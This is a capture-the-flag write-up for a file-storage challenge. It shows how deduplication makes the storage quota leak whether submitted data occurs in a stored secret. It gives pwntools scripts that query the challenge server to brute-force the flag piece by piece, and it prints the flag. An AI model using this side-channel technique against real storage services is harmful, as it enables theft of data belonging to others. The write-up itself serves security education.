We stored our flag on this platform, but forgot to save the id. Can you help us restore it?
Analysis
When running the program, we have 4 options.
➜ Google ./filestore.py
Welcome to our file storage solution.
Menu:
- load
- store
- status
- exit
Let's first look at the source code for saving and loading files.
First, all data is stored in blob:
# It's a tiny server...
blob = bytearray(2**16)
files = {}
used = 0
The storing of data works through deduplication. I've added some comments to the source code to make it more understandable:
# Use deduplication to save space.
def store(data):
nonlocal used
MINIMUM_BLOCK = 16
MAXIMUM_BLOCK = 1024
part_list = []
while data:
prefix = data[:MINIMUM_BLOCK]
ind = -1
bestlen, bestind = 0, -1
# Find the best 'matching' part of the blob
while True:
ind = blob.find(prefix, ind+1)
if ind == -1: break
length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
if length > bestlen:
bestlen, bestind = length, ind
# Store the index of the match
if bestind != -1:
part, data = data[:bestlen], data[bestlen:]
part_list.append((bestind, bestlen))
# Append to the end
else:
part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
blob[used:used+len(part)] = part
part_list.append((used, len(part)))
used += len(part)
assert used <= len(blob)
fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
files[fid] = part_list
return fid
Each 'file' is essentially represented by indices on the blob bytearray. If the new data is a duplicate of existing data, then no new data is stored onto the bytearray. Instead, the file is represented by an index pointing to the duplicated data.
For the purposes of analysis, we can print the first few bytes of blob and the part_list.
Here's an example:
➜ Google ./filestore.py
Welcome to our file storage solution.
# Saving the flag into the blob
bytearray(b'testflag\x00\x00')
[(0, 8)]
Menu:
- load
- store
- status
- exit
store
Send me a line of data...
test
# Duplicated data at index 0
bytearray(b'testflag\x00\x00')
[(0, 4)]
Stored! Here's your file id:
tObXrn5TRAMIGl6W
Now, if we look at the status command, we see that the 'Quota' represents the used space in the blob bytearray. Since duplicated data was stored, the quota remains at 0.008kB.
This is very helpful to us - it allows us to check whether the data we are storing is a substring of the flag. If it is a substring, then the quota should remain the same. Otherwise, new data is stored and the used quota increases.
Solving
This observation allows us to do a fairly trivial check for which characters are found in the flag. By sending each possible character and checking the quota value afterwards, we can confirm whether or not that character is found in the flag.
from pwn import *
import string
import re
result = ''
conn = remote('filestore.2021.ctfcompetition.com', 1337)
conn.recv()
conn.recv()
conn.send('status\r\n')
received = conn.recvuntil('Menu').decode()
match = re.search(r'Quota: (.+)/64.000kB', received)
target_quota = match[1]
conn.close()
valid = []
for char in string.ascii_letters + string.digits + '{}_':
conn = remote('filestore.2021.ctfcompetition.com', 1337)
conn.recv()
conn.send('store\r\n')
conn.recv()
conn.send(f'{char}\r\n')
conn.recvuntil('Menu')
conn.send('status\r\n')
received = conn.recvuntil('Menu').decode()
match = re.search(r'Quota: (.+)/64.000kB', received)
quota = match[1]
if quota == target_quota:
print(f"{char} works!")
valid.append(char)
conn.close()
print(valid)
But how do we get the flag? Checking each possible permutation of these valid characters would take too long, but we can reduce the time complexity by checking valid 2-character permutations, then combine these to check for valid 4-character permutations, and so on. This reduces the total number of permutations we have to check since it eliminates a lot of possible permutations early on.
from itertools import product
valid_n_chars = {1: valid}
LEN_FLAG = 26
i = 2
while i <= LEN_FLAG:
result = []
permutations = [''.join(x) for x in product(valid_n_chars[i // 2], repeat = 2)]
num_permutations = len(permutations)
count = 0
for permutation in permutations:
flag = ''.join(permutation)
print(f"Trying {flag}...")
conn = remote('filestore.2021.ctfcompetition.com', 1337)
conn.recv()
conn.send('store\r\n')
conn.recv()
conn.send(f'{flag}\r\n')
conn.recvuntil('Menu')
conn.send('status\r\n')
received = conn.recvuntil('Menu').decode()
match = re.search(r'Quota: (.+)/64.000kB', received)
quota = match[1]
if quota == target_quota:
print(f"{flag} works!")
result.append(flag)
conn.close()
if count % 10 == 0:
print('Progress:', count / num_permutations)
count += 1
valid_n_chars[i] = result
i *= 2
print('Valid results:', result)
This eventually outputs all valid 16-character substrings of the flag.
From here, we can reconstruct the flag: CTF{CR1M3_0f_d3dup1ic4ti0n}